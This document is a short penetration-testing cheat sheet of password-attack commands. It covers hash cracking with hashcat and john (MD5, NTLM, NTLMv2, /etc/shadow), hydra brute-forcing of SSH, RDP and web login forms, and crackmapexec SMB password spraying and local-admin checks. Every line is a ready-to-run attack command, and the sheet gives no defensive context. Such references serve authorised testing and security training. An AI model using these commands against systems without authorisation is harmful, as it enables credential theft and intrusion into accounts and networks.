Password Attacks¶

# Identify hash type
hashcat --identify hash.txt

# Dictionary attack (MD5)
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

# Dictionary + rules
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# NTLM
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

# NTLMv2
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

# Resume session
hashcat --restore

# Auto-detect and crack
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Show cracked passwords
john hash.txt --show

# Crack /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

# SSH
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<target>

# HTTP POST form
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# RDP
hydra -l administrator -P passwords.txt rdp://<target>

# CrackMapExec — SMB spray
crackmapexec smb <target_range> -u users.txt -p 'Password123' --continue-on-success

# Spray and check for local admin
crackmapexec smb <target> -u administrator -p 'Password123' --local-auth